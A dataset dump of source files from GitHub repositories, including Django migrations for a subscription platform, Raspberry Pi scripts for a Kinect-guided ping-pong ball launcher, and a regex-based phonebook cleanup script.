"alpha_fraction": 0.5386841893196106, "alphanum_fraction": 0.5552631616592407, "avg_line_length": 44.238094329833984, "blob_id": "7a463ae899e28caaafe5a47bf8043a3360d2e6d5", "content_id": "555a5543459076ea6c4ac181f61e584195b263f9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", 
"length_bytes": 3800, "license_type": "permissive", "max_line_length": 129, "num_lines": 84, "path": "/django-dashboard-atlantis-dark/platform_app/migrations/0001_initial.py", "repo_name": "prinjal-boruah/new_me", "src_encoding": "UTF-8", "text": "# Generated by Django 2.1.15 on 2020-05-14 09:13\n\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Card',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('card_number', models.BigIntegerField()),\n ('name_on_card', models.CharField(max_length=100)),\n ('expiry_date', models.CharField(max_length=4)),\n ],\n ),\n migrations.CreateModel(\n name='Organization',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('org_name', models.CharField(max_length=150)),\n ('comm_address1', models.TextField()),\n ('comm_address2', models.TextField()),\n ('comm_country', models.CharField(max_length=150)),\n ('comm_state', models.CharField(max_length=150)),\n ('comm_city', models.CharField(max_length=150)),\n ('comm_phone', models.BigIntegerField()),\n ('comm_email', models.EmailField(max_length=254)),\n ('comm_gstin', models.CharField(max_length=150)),\n ('bill_address1', models.TextField()),\n ('bill_address2', models.TextField()),\n ('bill_country', models.CharField(max_length=150)),\n ('bill_state', models.CharField(max_length=150)),\n ('bill_city', models.CharField(max_length=150)),\n ('bill_phone', models.BigIntegerField()),\n ('bill_email', models.EmailField(max_length=254)),\n ('bill_gstin', models.CharField(max_length=150)),\n ('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.CreateModel(\n name='Project',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('title', models.CharField(max_length=150)),\n ('description', models.TextField()),\n ('start_date', models.DateField()),\n ('end_date', models.DateField()),\n ('duration', models.IntegerField()),\n ('organization', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='platform_app.Organization')),\n ],\n ),\n migrations.CreateModel(\n name='SubscriptionPlan',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('plan', models.CharField(max_length=150)),\n ('description', models.TextField()),\n ('number_of_stakeholders', models.IntegerField()),\n ('price', models.BigIntegerField()),\n ('created', models.DateTimeField()),\n ('validity', models.IntegerField()),\n ],\n ),\n migrations.AddField(\n model_name='project',\n name='subscribed_plan',\n field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='platform_app.SubscriptionPlan'),\n ),\n migrations.AddField(\n model_name='card',\n name='organization',\n field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='platform_app.Organization'),\n ),\n ]\n" }, { "alpha_fraction": 0.588921308517456, "alphanum_fraction": 0.6180757880210876, "avg_line_length": 27.58333396911621, "blob_id": "5bfb66241a1aac5cdf8579601110a8e1f034ef64", "content_id": "96588dc3e31248461b1d8dc4055d8b8036f6a498", "detected_licenses": [ "MIT" ], 
"is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 686, "license_type": "permissive", "max_line_length": 140, "num_lines": 24, "path": "/django-dashboard-atlantis-dark/platform_app/migrations/0003_auto_20200515_0419.py", "repo_name": "prinjal-boruah/new_me", "src_encoding": "UTF-8", "text": "# Generated by Django 2.1.15 on 2020-05-14 22:49\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('platform_app', '0002_project_user'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='project',\n name='duration',\n field=models.IntegerField(blank=True, null=True),\n ),\n migrations.AlterField(\n model_name='project',\n name='subscribed_plan',\n field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, to='platform_app.SubscriptionPlan'),\n ),\n ]\n" } ]
9
cjb22/Ping-Pong-Shooter
https://github.com/cjb22/Ping-Pong-Shooter
a91dca66b96f1b394add0ab702386cca1683b98c
8d848cf9f127a0ff71db4973be9d71fb848cfd0d
3cddaa84304c69186ff7575ef18244f9deff4946
refs/heads/master
2020-06-11T07:30:23.986036
2019-08-23T10:19:36
2019-08-23T10:19:36
193,890,844
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6118375658988953, "alphanum_fraction": 0.6421197652816772, "avg_line_length": 36.74026107788086, "blob_id": "0d4e7aba7aee11dcdee7b0d8223fdc1cd4cf4122", "content_id": "3cbc7110cf52d150dd9e903a4bed42d806817ea3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 17436, "license_type": "no_license", "max_line_length": 167, "num_lines": 462, "path": "/Kinect.py", "repo_name": "cjb22/Ping-Pong-Shooter", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport numpy as np\nimport freenect\nimport cv2\nimport frame_convert2\nimport time\nimport math\nimport subprocess\nimport os\nos.system (\"sudo pigpiod\")\ntime.sleep(1) # Might not be necessary\nimport pigpio \n\n\n\n\n#Set up OpenCV named windows to display the picture\ncv2.namedWindow('Depth')\n# Depth = 480 x 640\n#cv2.namedWindow('Video')\nprint('Press ESC in window to stop')\n\n#Set up slidebar controls\ndef nothing(x):\n pass\ncv2.createTrackbar('Canny Low','Depth',0,255,nothing)\ncv2.setTrackbarPos('Canny Low', 'Depth',5)\ncv2.createTrackbar('Canny High','Depth',0,255,nothing)\ncv2.setTrackbarPos('Canny High', 'Depth',35)\ncv2.createTrackbar('Contour Length','Depth',0,6000,nothing)\ncv2.setTrackbarPos('Contour Length', 'Depth',1500)\ncv2.createTrackbar('Contour Area','Depth',0,200,nothing)\ncv2.setTrackbarPos('Contour Area', 'Depth',10)\n#cv2.createTrackbar('Segment Length','Depth',1,500,nothing)\n#cv2.setTrackbarPos('Segment Length', 'Depth',200)\n#cv2.createTrackbar('Closeness Threshold','Depth',0,300,nothing)\n#cv2.setTrackbarPos('Closeness Threshold', 'Depth',80)\n\npi = pigpio.pi() \n\n#Kinect Image Functions (video is unused)\ndef get_depth(img):\n return frame_convert2.pretty_depth_cv(img)\ndef get_video():\n return frame_convert2.video_cv(freenect.sync_get_video()[0])\n\n#Depth camera general information\nxRes, yRes = 640, 480 # Width x Height = 640 x 480 pixels\nhorizonY = 360 # The Y pixel height which corresponds to horizontal plane (depends on physical angle of the Kinect)\nxFOV, yFOV = 58.5, 46.6 # Field of view dimensions (degrees)\ndegreesPerPixelX = xFOV / xRes # For simplification, a perfect camera model is assumed\ndegreesPerPixelY = yFOV / yRes\n\n\n#Function to check if a point is within specified coordinates\nboundaryThresholdX = 20\nboundaryThresholdY = 80\ndef insideBoundaries(x, y):\n if x < xRes - boundaryThresholdX and x > boundaryThresholdX:\n if y < yRes - boundaryThresholdY and y > boundaryThresholdY:\n return True\n return False\n\n#Function to find potential line segments in a contour which could be hands\ndef findHandLineSegments(contours, segmentLength, maxEndpointCloseness):\n contourSegments = []\n for ctr in contours:\n\n #Divide the contour up into segments of set length\n amtOfSegments = len(ctr) / segmentLength \n for i in range(amtOfSegments) :\n #For each line, determine if the endpoints are close enough to each other\n line = ctr[ i * segmentLength : (i+1) * segmentLength ,:]\n x0 = line[0][0][0]\n x1 = line[-1][0][0]\n y0 = line[0][0][1]\n y1 = line[-1][0][1]\n xMid = line[segmentLength / 2][0][0]\n yMid = line[segmentLength / 2][0][1]\n distance = math.hypot(x1 - x0, y1 - y0)\n if distance < maxEndpointCloseness:\n #Discard any lines that are too close to the edge\n if insideBoundaries(x0, y0) and insideBoundaries(x1, y1) and insideBoundaries(xMid, yMid):\n contourSegments.append( line )\n\n #Find lines between halfwaypoints of the lines (overlapping line segments)\n if i > 0:\n line = ctr[ i * segmentLength 
- ( segmentLength / 2 ) : (i+1) * segmentLength - ( segmentLength / 2 ) ,:]\n x0 = line[0][0][0]\n x1 = line[-1][0][0]\n y0 = line[0][0][1]\n y1 = line[-1][0][1]\n xMid = line[segmentLength / 2][0][0]\n yMid = line[segmentLength / 2][0][1]\n distance = math.hypot(x1 - x0, y1 - y0)\n if distance < maxEndpointCloseness:\n if insideBoundaries(x0, y0) and insideBoundaries(x1, y1) and insideBoundaries(xMid, yMid):\n contourSegments.append( line )\n\n return contourSegments\n\n#Function to draw line segments\ndef drawSegments(segments, Thickness, drawWithAlternatingThickness = False):\n i = 0\n for seg in segments:\n if not drawWithAlternatingThickness:\n cv2.drawContours(imgray, seg, -1 , (0,255,0), Thickness)\n else:\n if i % 2 == 0:\n cv2.drawContours(imgray, seg, -1 , (0,255,0), Thickness)\n else:\n cv2.drawContours(imgray, seg, -1 , (0,255,0), Thickness * 2)\n i = i + 1\n\n \n#Calculate actual distance in meters using a Kinect 360 reading\ndef distanceInMeters(kinectReading):\n #distKin = rawDepth [pY,pX]\n #dist = distanceInMeters(distKin)\n return 0.1236 * math.tan( kinectReading / 2842.5 + 1.1863)\n\n#Function to find the center pixel location of a contour segment\ndef findCenterCoordinates(seg):\n coordinatesAreValid = False\n centerX = -1\n centerY = -1\n M = cv2.moments(seg)\n if M[\"m00\"] > 0:\n centerX = int(M[\"m10\"] / M[\"m00\"])\n centerY = int(M[\"m01\"] / M[\"m00\"]) \n if centerX > 0 and centerX < 640 and centerY > 0 and centerY < 480:\n coordinatesAreValid = True\n return centerX, centerY, coordinatesAreValid\n\n#Function to find center pixel locations of a list of contour segments\ndef findCenterCoordinatesMultiple(contours):\n centerPoints = []\n for ctr in contours:\n ctrX, ctrY, isValid = findCenterCoordinates(ctr)\n if isValid:\n centerPoints.append([ctrX, ctrY])\n return centerPoints\n\n#Find hand shaped contour segments using depth filtering, center locations and the number of convex hull defects\ndef findHandshapes(contourSegments, Range):\n hulls = []\n minDist = -1\n maxDist = -1\n minDefects = -1\n maxDefects = -1\n minArea = -1\n \n if Range == \"C\" or Range == \"Close\":\n minDist = 0.5\n maxDist = 1.4\n minDefects = 4\n maxDefects = 16\n minArea = 1000\n elif Range == \"M\" or Range == \"Mid\":\n minDist = 1.2\n maxDist = 2.5\n minDefects = 4\n maxDefects = 16\n minArea = 600\n elif Range == \"F\" or Range == \"Far\":\n minDist = 2.5\n maxDist = 4.0\n minDefects = 3\n maxDefects = 10\n minArea = 400\n \n\n for seg in contourSegments:\n\n #First check if the segment is at the right depth and at a proper pixel location\n centerX, centerY, coordinatesAreValid = findCenterCoordinates(seg)\n if coordinatesAreValid:\n centerDist = distanceInMeters( rawDepth [centerY,centerX] )\n if centerDist > minDist and centerDist < maxDist:\n\n #Next, check if the number of convex hull defects\n cvxHull = cv2.convexHull(seg,returnPoints = False)\n defects = cv2.convexityDefects(seg,cvxHull)\n amtOfHullDefects = defects.shape[0]\n if amtOfHullDefects >= minDefects and amtOfHullDefects <= maxDefects:\n\n #Next, check if the contour area and the contour's hull area are within a specified ratio\n hullArea = cv2.contourArea(cv2.convexHull(seg,returnPoints = True))\n segArea = cv2.contourArea(seg)\n segToHullRatio = hullArea / segArea\n if segArea > minArea and segToHullRatio > 1.1 and segToHullRatio < 1.5: \n hulls.append(seg)\n return hulls\n\n\n\nlastFoundClose = np.empty(20, dtype = list)\nlastFoundMid = np.empty(20, dtype = list)\nlastFoundFar = np.empty(20, dtype = 
list)\niterCount = 0\niterationsToTrack = 20\n\nfor i in range(iterationsToTrack):\n lastFoundClose[i] = []\n lastFoundMid[i] = []\n lastFoundFar[i] = []\n \ndef findPersistentCenterPoints(mostRecentCtrPoints, previousCtrPoints):\n toReturn = (-1,-1)\n similarPointsToFind = 6\n \n for ctrPoint in mostRecentCtrPoints:\n #At least 6 points must be found in the last 20 for it to be considered persistent\n similarPointsFound = 0\n\n #Check the last 20 iterations to see how many similar points have been found previously\n for i in range(iterationsToTrack):\n aPreviousIteration = previousCtrPoints[i]\n for prevCtrPoint in aPreviousIteration:\n diffX = abs( ctrPoint[0] - prevCtrPoint[0] )\n diffY = abs( ctrPoint[1] - prevCtrPoint[1] )\n if diffX < 30 and diffY < 40:\n similarPointsFound += 1\n if similarPointsFound > similarPointsToFind:\n similarPointsToFind = similarPointsFound\n toReturn = (ctrPoint[0], ctrPoint[1])\n\n return toReturn\n\n#Functions for the hopper servo\nhopperPin = 21\ndef setHopperServoHome():\n pi.set_servo_pulsewidth(hopperPin,1900)\n time.sleep(0.2)\n pi.set_servo_pulsewidth(hopperPin,0)\n\ndef activateHopper():\n pi.set_servo_pulsewidth(hopperPin,800)\n time.sleep(0.2)\n pi.set_servo_pulsewidth(hopperPin,1900)\n time.sleep(0.25)\n pi.set_servo_pulsewidth(hopperPin,0)\n\n#Function to find the necessary speed to launch the ball\n#This speed is calculated using a parabolic trajectory, with the assumption that air resistance is negligible\nscalingFactor = 1. #An overall scaling factor for any necessary quick tuning\nbarrelAngle = 55 #The barrel angle (degrees)\ndef findLaunchVelocity(distanceX, distanceY):\n #Convert the barrel angle from degrees to radians before applying trig functions\n velSquared = -9.81 * distanceX ** 2 / (2 * distanceY * math.cos(math.radians(barrelAngle)) ** 2) * 1 / (1 - math.tan(math.radians(barrelAngle)) * distanceX / distanceY)\n vel = math.sqrt(abs(velSquared))\n \n return vel\n \n \n#Function to activate the ESC Brushless Motors:\nescPin = 20\nflywheelOffAxisAngle = 10 #The motors are mounted off axis to give spin for stability\nflywheelRadius = 0.02 #In meters\nmotorKVRating = 600 #Per volt applied, the motor will spin at this RPM (Depends on motor and load)\nescVoltage = 5.8 #The input voltage to the ESC. Should be a stable voltage for consistent results. 
\nmaxPWMPulsewidth = 2100 #The high range PWM extreme for activating the ESC (max speed)\nminPWMPulsewidth = 900 #The low range PWM extreme for activating the ESC (zero speed)\n\n\n#Calibrate the maximum and minimum PWM\n#This step makes the ESCs audibly beep, which gives a good alert for any persons nearby\npi.set_servo_pulsewidth(escPin, maxPWMPulsewidth)\n#pi.set_servo_pulsewidth(escPin, 0)\ntime.sleep(1)\npi.set_servo_pulsewidth(escPin, minPWMPulsewidth)\n#pi.set_servo_pulsewidth(escPin, 0)\ntime.sleep(1)\n \ndef launchBall(launchVelocity):\n\n\n #Calculate the required PWM signal\n wheelVelocity = launchVelocity / math.cos( math.radians( flywheelOffAxisAngle ) )\n wheelRPM = wheelVelocity * 60 / (2 * math.pi ) / flywheelRadius # v = 2pi / 60 * r * RPM\n minimumRPM = 0\n maximumRPM = escVoltage * motorKVRating\n if wheelRPM > maximumRPM:\n print \"Cant launch far enough\"\n wheelRPM = maximumRPM - 30\n\n \n PWMSignal = np.interp(wheelRPM, [0, maximumRPM], [minPWMPulsewidth, maxPWMPulsewidth])\n PWMSignal = int(PWMSignal)\n \n \n print PWMSignal\n\n\n\n #Fire at speed\n pi.set_servo_pulsewidth(escPin, PWMSignal)\n #pi.set_servo_pulsewidth(escPin, 0)\n time.sleep(1)\n\n #Drop the ball down\n activateHopper()\n time.sleep(0.4)\n \n # Shut the ESC back down\n pi.set_servo_pulsewidth(escPin, minPWMPulsewidth)\n #pi.set_servo_pulsewidth(escPin, 0)\n\n\n \n \n\n\n\n#Main Program\nsetHopperServoHome()\n \nwhile 1:\n #------------------------------------------------------------------------------\n #Measure start time\n start = time.time()\n\n #Read Trackbars\n cannyLow = cv2.getTrackbarPos('Canny Low', 'Depth')\n cannyHigh = cv2.getTrackbarPos('Canny High', 'Depth')\n ctrAreaThresh = cv2.getTrackbarPos('Contour Length', 'Depth')\n ctrLenThresh = cv2.getTrackbarPos('Contour Area', 'Depth')\n #segmentLength = cv2.getTrackbarPos('Segment Length', 'Depth')\n #segLenThreshold = cv2.getTrackbarPos('Closeness Threshold', 'Depth')\n\n #Get the raw 11-bit integer depth image, and make an 8-bit copy for OpenCV operations \n rawDepth = freenect.sync_get_depth()[0]\n imgray = np.copy(rawDepth)\n imgray = get_depth(imgray)\n\n #Use Canny algorithm to find edges on the depth image\n edges = cv2.Canny(imgray,cannyLow,cannyHigh,3)\n\n #Dilation and erosion to make the edges more pronounced\n edKernel = np.ones((3,3),np.uint8)\n edges = cv2.dilate(edges, edKernel, iterations = 1)\n\n #Contour detection\n contours, hierarchy = cv2.findContours(edges, cv2.RETR_LIST, cv2.CHAIN_APPROX_NONE)\n #Preliminary contour filtering\n filteredContours = []\n for ctr in contours:\n approx = cv2.approxPolyDP(ctr,0.01*cv2.arcLength(ctr,True),True)\n area = cv2.contourArea(ctr)\n if area > ctrAreaThresh and len(approx) > ctrLenThresh: \n filteredContours.append(ctr) \n\n #Draw the contours\n #cv2.drawContours(imgray, filteredContours, -1, (0,255,0), 2)\n\n #Find line segments which might resemble a hand\n contourSegmentsClose = findHandLineSegments(filteredContours, 370, 80)\n contourSegmentsMid = findHandLineSegments(filteredContours, 200, 50)\n contourSegmentsFar = findHandLineSegments(filteredContours, 80, 30)\n\n #Draw the line segments\n #drawSegments(contourSegmentsClose,3,True)\n #drawSegments(contourSegmentsMid,3,True)\n #drawSegments(contourSegmentsFar,3,True)\n \n #Convex hulls of hands\n handshapesClose = findHandshapes(contourSegmentsClose, \"Close\")\n handshapesMid = findHandshapes(contourSegmentsMid, \"Mid\")\n handshapesFar = findHandshapes(contourSegmentsFar, \"Far\")\n\n #Find the center coordinates of the hand 
shapes, and keep track of the most recent n iterations\n centerPointsClose = findCenterCoordinatesMultiple(handshapesClose)\n centerPointsMid = findCenterCoordinatesMultiple(handshapesMid)\n centerPointsFar = findCenterCoordinatesMultiple(handshapesFar)\n\n #Find coordinates for handshapes\n handCoordinatesClose = findPersistentCenterPoints(centerPointsClose, lastFoundClose)\n handCoordinatesMid = findPersistentCenterPoints(centerPointsMid, lastFoundMid)\n handCoordinatesFar = findPersistentCenterPoints(centerPointsFar, lastFoundFar)\n\n #Add the most recent findings to the list\n lastFoundClose[iterCount] = centerPointsClose \n lastFoundMid[iterCount] = centerPointsMid\n lastFoundFar[iterCount] = centerPointsFar\n\n #Draw the (potential) hand segments \n drawSegments(handshapesClose, 2)\n drawSegments(handshapesMid, 4)\n drawSegments(handshapesFar, 6)\n\n\n #Find where to toss to \n tossRange = \"\"\n toTossTo = (-1,-1)\n if not handCoordinatesClose == (-1,-1):\n cv2.circle(imgray, handCoordinatesClose, 12, (0,255,0), 4)\n tossRange = \"Close\"\n toTossTo = handCoordinatesClose\n\n elif not handCoordinatesMid == (-1,-1):\n cv2.circle(imgray, handCoordinatesMid, 14, (0,255,0), 4)\n tossRange = \"Mid\"\n toTossTo = handCoordinatesMid\n \n elif not handCoordinatesFar == (-1,-1):\n cv2.circle(imgray, handCoordinatesFar, 16, (0,255,0), 4)\n tossRange = \"Far\"\n toTossTo = handCoordinatesFar\n\n #Determine the angle which the Kinect needs to rotate to center the hand\n if not toTossTo == (-1,-1):\n \n horizPixelDistanceFromCenter = toTossTo[0] - ( xRes / 2 )\n vertPixelDistanceFromHorizon = horizonY - toTossTo[1]\n \n toTurnAngle = degreesPerPixelX * horizPixelDistanceFromCenter\n launchAngle = degreesPerPixelY * vertPixelDistanceFromHorizon\n\n if toTurnAngle < -1 or toTurnAngle > 1:\n subprocess.call( [ 'python2.7', 'MoveStepper.py', str(toTurnAngle) ] )\n #MoveStepper.turnDegrees(toTurnAngle)\n\n else:\n distanceToHand = distanceInMeters( rawDepth [toTossTo[1], toTossTo[0]] )\n horizDistanceMeters = distanceToHand * math.sin(math.radians(launchAngle))\n vertDistanceMeters = distanceToHand * math.cos(math.radians(launchAngle))\n\n launchVelocity = findLaunchVelocity(horizDistanceMeters, vertDistanceMeters)\n launchBall(launchVelocity)\n #cv2.putText(imgray, \"Up (m): \" + str(horizDistanceMeters), (10, 30), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,255,0))\n #cv2.putText(imgray, \"Out (m): \" + str(vertDistanceMeters), (10, 80), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,255,0))\n\n #Wait for a few seconds (Won't need to catch again for at least this long ;)\n time.sleep(3)\n \n \n\n \n \n\n #Draw the horizontal plane line and a center line\n cv2.line(imgray,(0,horizonY),(639,horizonY),(0,255,0),1)\n cv2.line(imgray,(xRes/2, horizonY - 50), (xRes/2 , horizonY + 50),(0,255,0),1)\n \n #Display the image\n cv2.imshow('Depth', imgray)\n #cv2.imshow('Edges', edges)\n #cv2.imshow('Video', get_video())\n\n iterCount = ( iterCount + 1 ) % iterationsToTrack \n if cv2.waitKey(10) == 27:\n break\n\n\n #Calculate the FPS\n totTime = time.time() - start\n FPS = 1 / totTime\n #-------------------------------------------------------------------------------\n \n# When everything done, release the capture\nprint 'FPS: ', FPS\npi.stop() # Disconnect pigpio.\ncv2.destroyAllWindows()\n" }, { "alpha_fraction": 0.7798507213592529, "alphanum_fraction": 0.7910447716712952, "avg_line_length": 58.55555725097656, "blob_id": "ffa55b1a666edad504c854e0c77e6e70ba2e60bc", "content_id": "e29126ea4bf8dd146d34485b67402e9c9a8b90cb", 
"detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 536, "license_type": "no_license", "max_line_length": 126, "num_lines": 9, "path": "/Readme.txt", "repo_name": "cjb22/Ping-Pong-Shooter", "src_encoding": "UTF-8", "text": "This code is for a self-made Ping-Pong ball shooter which finds hands using a depth image and tosses a ball straight at it.\nThe code is run on a Raspberry Pi 3 B+.\nInformation and demonstrations at www.tiny.cc/ShootingRobot\n\nMain Program = Kinect.py (Python 2.7) \n\nBefore running, ensure that the Xbox 360 Kinect is plugged in.\nThe program will take several seconds to start up, some patience is required :) \nOccasionally the program quits with an error message several seconds after starting, just restart the program if this happens.\n" }, { "alpha_fraction": 0.5656565427780151, "alphanum_fraction": 0.5941230654716492, "avg_line_length": 25.475608825683594, "blob_id": "ae5236545c1962703c1e1a7359dc6fbaeead8bf5", "content_id": "3bbf58987562350e1fcb0dbfa05164e13efdf156", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2178, "license_type": "no_license", "max_line_length": 114, "num_lines": 82, "path": "/MoveStepper.py", "repo_name": "cjb22/Ping-Pong-Shooter", "src_encoding": "UTF-8", "text": "import RPi.GPIO as GPIO\nimport time\nimport sys\n\n#Define The Stepper Control Pins\nStepPin = 19\nDirectionPin = 26\n\n#Setup GPIO\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(StepPin,GPIO.OUT)\nGPIO.setup(DirectionPin, GPIO.OUT)\n\n\nStepPauseTime = 0.0005\n\n \ndef turnSteps( dir, steps):\n if dir == \"CW\":\n GPIO.output(DirectionPin,GPIO.LOW)\n else:\n GPIO.output(DirectionPin,GPIO.HIGH)\n\n for i in range(steps):\n GPIO.output(StepPin, GPIO.HIGH)\n time.sleep(StepPauseTime)\n GPIO.output(StepPin, GPIO.LOW)\n time.sleep(StepPauseTime)\n\n\n# Function to turn the stepper motor, which is connected to a bigger gear\nbigToSmallRatio = 123/25. # Gear ratio\ndegreesPerStep = 1.8 / 8 # Using an 1.8 degree stepper motor, operating at 1/8th steps, fill in 1.8 / 8\ndef turnDegrees( degrees):\n\n # Check the direction to turn\n if degrees < 0:\n GPIO.output(DirectionPin,GPIO.HIGH) # CCW\n degrees = degrees * -1\n else:\n GPIO.output(DirectionPin,GPIO.LOW) # CW\n\n # Determine the amount of steps to turn by\n smallGearToTurn = bigToSmallRatio * degrees\n stepsToTake = smallGearToTurn / degreesPerStep\n\n # Turn the stepper\n for i in range(int(stepsToTake)):\n GPIO.output(StepPin, GPIO.HIGH)\n time.sleep(StepPauseTime)\n GPIO.output(StepPin, GPIO.LOW)\n time.sleep(StepPauseTime)\n \n\n\nif __name__ == \"__main__\":\n if len(sys.argv) == 3:\n dir = sys.argv[1]\n steps = int(sys.argv[2])\n if (dir == \"CW\" or dir == \"CCW\"):\n if (steps > 0 and steps <= 2000):\n turnSteps(dir, steps)\n else: print(\"Amount of steps not valid. (0 - 2000)\")\n else:print (\"Direction not valid. (CW or CCW)\")\n\n elif len(sys.argv) == 2:\n degrees = float(sys.argv[1])\n if degrees > -360 and degrees < 360:\n turnDegrees(degrees)\n else: print(\"Degrees number not valid. (-360 - 360)\")\n \n \n\n else:\n print(\"MoveStepper test use case (R-L-R)\")\n turnSteps(\"CW\",250)\n turnSteps(\"CCW\",500)\n turnSteps(\"CW\",250)\n \n\n \nGPIO.cleanup() \n" } ]
3
passatijy/2.2.Regexp
https://github.com/passatijy/2.2.Regexp
46fd201155721e32d6292f39322aa72acc478463
a9e4c9db1ae86f9f269d59a13fb986efd9d49cca
fc3d554aaef4d1747ad691254a88667df450b486
refs/heads/master
2020-07-20T04:36:30.401251
2019-09-10T14:55:25
2019-09-10T14:55:25
206,574,100
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5667185187339783, "alphanum_fraction": 0.5931570529937744, "avg_line_length": 28.495412826538086, "blob_id": "093286b8df7c523a3458c794f0d6f67acfdc137e", "content_id": "e0453b452976d7e4c5379785b6d165f4fef2fead", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3767, "license_type": "no_license", "max_line_length": 153, "num_lines": 109, "path": "/adressbook.py", "repo_name": "passatijy/2.2.Regexp", "src_encoding": "UTF-8", "text": "# Tasks:\n'''\n1. поместить Фамилию, Имя и Отчество человека в поля lastname, \nfirstname и surname соответственно. В записной книжке \nизначально может быть Ф + ИО, ФИО, а может быть сразу правильно: Ф+И+О;\n2. привести все телефоны в формат +7(999)999-99-99. \nЕсли есть добавочный номер, формат будет такой: \n+7(999)999-99-99 доб.9999;\n3. объединить все дублирующиеся записи о человеке в одну.\n'''\nimport re\nfrom pprint import pprint\n# читаем адресную книгу в формате CSV в список contacts_list\nimport csv\nwith open(\"phonebook_raw.csv\", encoding=\"utf-8\") as f:\n rows = csv.reader(f, delimiter=\",\")\n contacts_list = list(rows)\n#print(contacts_list)\n\n# TODO 1: выполните пункты 1-3 ДЗ\n# ваш код\n\ndef my_replace(srch_pattrn, rpl_pattrn, mylist):\n\tres_contacts = []\n\tfor elem in mylist:\n\t\tif elem[0] != 'lastname':\n\t\t\tk = ','.join(elem)\n\t\t\tk = re.sub(srch_pattrn, rpl_pattrn, k)\n\t\t\telem = k.split(',')\n\t\t\tres_contacts.append(elem)\n\t\telse:\n\t\t\tres_contacts.append(elem)\n\treturn res_contacts\n\ndef glue_two_elems(elem1,elem2):\n\t'''return only one element with maximum info'''\n\tone = elem1.copy()\n\ttwo = elem2.copy()\n\ti = 0\n\twhile i < len(elem1):\n#\t\tif one[i] and two[i] is not '':\n\t\tif one[i] is not '':\n\t\t\tif two[i] is not '':\n\t\t\t\tif one[i] != two[i]:\n\t\t\t\t\tone[i] = one[i] + '/' + two[i]\n\t\telse:\n\t\t\tif two[i] is not '':\n\t\t\t\tone[i] = two[i]\n\t\ti = i + 1\n\treturn one\n\n\ndef my_uniq(mylist):\n\t'''uniq bu ID = lastname '''\n\ttemplist = mylist.copy()\n\tres_contacts=[]\n\ti = 0\n\twhile i < len(templist):\n\t\tres_elem = templist[i]\n\t\t#print('Перебираем, элемент номер:',i,'является:',templist[i])\n\t\tk = i + 1\n\t\twhile k < len(templist):\n\t\t\t#print(' ищем совпадения, рез. 
element:', res_elem,'element k:', templist[k])\n\t\t\tif res_elem[0] == templist[k][0]:\n\t\t\t\t#print(' match found')\n\t\t\t\tres_elem = glue_two_elems(res_elem,templist[k])\n\t\t\t\ttemplist.remove(templist[k])\n\t\t\t\t#print(' resulting element to append:',res_elem)\n\t\t\t#else:\n\t\t\t\t#print(' no match found')\n\t\t\tk = k + 1\n\t\tres_contacts.append(res_elem)\n\t\ti = i + 1\n\treturn res_contacts\n\n# TODO 2: save the resulting data to another file\n# code for writing the file in CSV format\ndef filewriter(outputlist):\n\twith open(\"phonebook.csv\", \"w\", encoding=\"utf-8\") as f:\n\t\tdatawriter = csv.writer(f, delimiter=',')\n\t\t# Substitute your own list for contacts_list\n\t\tdatawriter.writerows(outputlist)\n\n\nif __name__ == '__main__':\n\tfor k in contacts_list:\n\t\tprint('Initial list:', k)\n\t# first call r\"(^([А-Яа-я])*)(\\s)([А-Яа-я])\", r\"\\1,\\4\", k\n\trename = my_replace(\n\t\tr\"(^([А-Яа-я])*)(\\s)([А-Яа-я])\"\n\t\t, r\"\\1,\\4\"\n\t\t, contacts_list)\n\t# second call r\",([А-Яа-я]*)( )([А-Яа-я]*)(,)\", r\",\\1,\\3\", k\n\trename1 = my_replace(\n\t\tr\",([А-Яа-я]*)( )([А-Яа-я]*)(,)\"\n\t\t, r\",\\1,\\3\"\n\t\t, rename)\n\t#print(rename1)\n\t# last call r\"(\\+)*(\\d)(\\s)*(\\(*)(\\d\\d\\d)(\\)*)(\\s*)(\\-*)(\\d\\d\\d)(\\-*)(\\d\\d)(\\-*)(\\d\\d)(\\s*)(\\(*)(доб\\.)*(\\s*)(\\d*)(\\))*\", r\"+\\2(\\5)\\9-\\11-\\13 \\16\\18\", k\n\trename2 = my_replace(\n\t\tr\"(\\+)*(\\d)(\\s)*(\\(*)(\\d\\d\\d)(\\)*)(\\s*)(\\-*)(\\d\\d\\d)(\\-*)(\\d\\d)(\\-*)(\\d\\d)(\\s*)(\\(*)(доб\\.)*(\\s*)(\\d*)(\\))*\"\n\t\t, r\"+\\2(\\5)\\9-\\11-\\13 \\16\\18\"\n\t\t, rename1)\n\t#print(rename2)\n\tprint('========================')\n\tresult = my_uniq(rename2)\n\tfor k in result:\n\t\tprint('Result list:', k)\n\tfilewriter(result)\n" }, { 